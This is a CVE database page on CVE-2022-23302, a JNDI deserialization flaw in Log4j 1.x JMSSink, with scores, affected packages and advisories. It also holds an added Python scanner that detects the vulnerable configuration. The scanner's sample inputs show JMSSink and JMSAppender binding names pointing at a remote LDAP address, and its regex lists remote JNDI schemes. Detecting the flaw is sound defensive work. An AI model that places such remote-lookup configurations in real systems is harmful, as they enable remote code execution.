CVE-2022-23302

Severity: 8.8 HIGH
EPSS: 0.6% (top 29.23%)
CISA KEV: Not in KEV
Exploit: No known exploits
Timeline: Published Jan 18; latest update Jun 23

Description

JMSSink in all versions of Log4j 1.x is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration or if the configuration references an LDAP service the attacker has access to. The attacker can provide a TopicConnectionFactoryBindingName configuration causing JMSSink to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-4104. Note this issue only affects Log4j 1.x when specifically configured to use JMSSink.
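The description above makes the bug conditional: it is reachable only when JMSSink is actually configured, and exploitable only when the TopicConnectionFactoryBindingName it looks up, or the LDAP service the JNDI provider points at, is under attacker influence. The triage script below is an added example, not code from this page or from Apache: it scans configuration text for exactly those preconditions. In Log4j 1.x, JMSSink's main receives the binding name as its first positional argument and resolves the JNDI provider through InitialContext (so typically from jndi.properties), which is why a launch command line and a jndi.properties fragment are checked alongside the log4j.properties/log4j.xml key that the JMSAppender sibling (CVE-2021-4104) uses. The regexes, the verdict wording, the file names and the RFC 5737 address are this example's own assumptions; the sample inputs are constructed.

```python
"""Triage scan for the CVE-2022-23302 preconditions (added example, not Apache code).

Flags, per input line:
  jmssink-referenced        a reference to org.apache.log4j.net.JMSSink
  remote-jndi-binding-name  a TopicConnectionFactoryBindingName that is a remote JNDI URL
  ldap-provider-url         java.naming.provider.url pointing at an LDAP server
Regexes, file names and sample inputs are this example's own assumptions.
"""
import re
from typing import Dict, List

JMSSINK_CLASS = "org.apache.log4j.net.JMSSink"

# A JNDI lookup of a name that is itself a URL is dispatched to that URL scheme's
# context factory, so a binding name such as ldap://host/... is a remote lookup.
REMOTE_JNDI_SCHEME = re.compile(r"^(ldaps?|rmi|iiop|iiopname|corbaname|dns|nis)://", re.I)

# Three places the binding name can appear: a properties key=value, a log4j.xml
# <param/>, or the first positional argument to JMSSink's main on a command line.
PROP_BINDING = re.compile(r"TopicConnectionFactoryBindingName\s*=\s*(\S+)", re.I)
XML_BINDING = re.compile(r'name="TopicConnectionFactoryBindingName"\s+value="([^"]*)"', re.I)
CLI_BINDING = re.compile(re.escape(JMSSINK_CLASS) + r"\s+(\S+)")
PROVIDER_URL = re.compile(r"java\.naming\.provider\.url\s*=\s*(\S+)", re.I)


def scan_text(text: str, source: str) -> List[Dict[str, object]]:
    """Return one finding dict per suspicious line (empty list: nothing matched)."""
    findings: List[Dict[str, object]] = []

    def add(lineno: int, kind: str, detail: str) -> None:
        findings.append({"source": source, "line": lineno, "kind": kind, "detail": detail})

    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("<!--"):
            continue  # comments cannot configure anything
        if "JMSSink" in line:
            add(lineno, "jmssink-referenced", line)
        for pattern in (PROP_BINDING, XML_BINDING, CLI_BINDING):
            m = pattern.search(line)
            if m:
                if REMOTE_JNDI_SCHEME.match(m.group(1)):
                    add(lineno, "remote-jndi-binding-name", m.group(1))
                break  # one binding-name form per line is enough
        m = PROVIDER_URL.search(line)
        if m and m.group(1).lower().startswith(("ldap://", "ldaps://")):
            add(lineno, "ldap-provider-url", m.group(1))
    return findings


def verdict(findings: List[Dict[str, object]]) -> str:
    """Collapse findings into the practical question: is JMSSink in scope here?"""
    kinds = {f["kind"] for f in findings}
    if "jmssink-referenced" not in kinds:
        return "JMSSink not configured: CVE-2022-23302 not reachable in these inputs"
    if kinds & {"remote-jndi-binding-name", "ldap-provider-url"}:
        return "JMSSink configured with remote JNDI/LDAP lookup: treat as exploitable"
    return "JMSSink configured: verify who can write this config and what the JNDI provider is"


# Constructed sample inputs (RFC 5737 address; not taken from any real deployment).
SAMPLE_START_SCRIPT = """#!/bin/sh
java -cp lib/log4j-1.2.17.jar:lib/jms.jar org.apache.log4j.net.JMSSink ldap://192.0.2.10:1389/o=x logTopic guest guest log4j.properties
"""
SAMPLE_JNDI_PROPERTIES = """java.naming.factory.initial=com.sun.jndi.ldap.LdapCtxFactory
java.naming.provider.url=ldap://192.0.2.10:1389
"""
SAMPLE_LOG4J_XML = """<appender name="jms" class="org.apache.log4j.net.JMSAppender">
  <param name="TopicConnectionFactoryBindingName" value="ldap://192.0.2.10:1389/o=x"/>
  <param name="TopicBindingName" value="logTopic"/>
</appender>
"""
SAMPLE_CLEAN_LOG4J = """log4j.rootLogger=INFO, file
log4j.appender.file=org.apache.log4j.RollingFileAppender
log4j.appender.file.File=app.log
"""

if __name__ == "__main__":
    inputs = {"start.sh": SAMPLE_START_SCRIPT, "jndi.properties": SAMPLE_JNDI_PROPERTIES,
              "log4j.xml": SAMPLE_LOG4J_XML, "log4j.properties": SAMPLE_CLEAN_LOG4J}
    all_findings = [f for name, text in inputs.items() for f in scan_text(text, name)]
    for f in all_findings:
        print(f"{f['source']}:{f['line']}: {f['kind']}: {f['detail']}")
    print(verdict(all_findings))
```

The scan is deliberately a text heuristic rather than a parser: it only answers whether JMSSink is wired in and whether the lookup target is remote. A reference to JMSSink with a plain binding name is still a finding, because the description's first precondition is write access to the configuration, and that is a question about file permissions and deployment pipeline, not about the current value.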

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Exploitability: 2.8 | Impact: 5.9

Affected Packages (29 packages)

Source | Package | Versions
CVEListV5 | apache_software_foundation/apache_log4j_1.x | 1.0.1 to unspecified (+1)
Debian | apache-log4j1.2 | < 1.2.17-10+deb11u1 (+3)
Ubuntu | apache-log4j1.2 | < 1.2.17-8+deb10u1ubuntu0.2 (+3)
NVD | apache/log4j | 1.0.1 to 1.2.17
Maven | log4j:log4j | 1.2.17

Patches

🔴 Vulnerability Details (6)

OSV: apache-log4j1.2 vulnerabilities (2025-06-23)
OSV: apache-log4j1.2 vulnerabilities (2023-04-05)
GHSA: Deserialization of Untrusted Data in Log4j 1.x (2022-01-21)
OSV: Deserialization of Untrusted Data in Log4j 1.x (2022-01-21)
OSV: CVE-2022-23302: JMSSink in all versions of Log4j 1.x (2022-01-18)

📋 Vendor Advisories (4)

Ubuntu: Apache Log4j vulnerabilities (2025-06-23)
Ubuntu: Apache Log4j vulnerabilities (2023-04-05)
Red Hat: log4j: Remote code execution in Log4j 1.x when application is configured to use JMSSink (2022-01-18)
Debian: CVE-2022-23302: apache-log4j1.2 - JMSSink in all versions of Log4j 1.x is vulnerable to deserialization of untrust... (2022)

CVE-2022-23302 (HIGH, CVSS 8.8) | JMSSink in all versions of Log4j 1.x | cvebase.io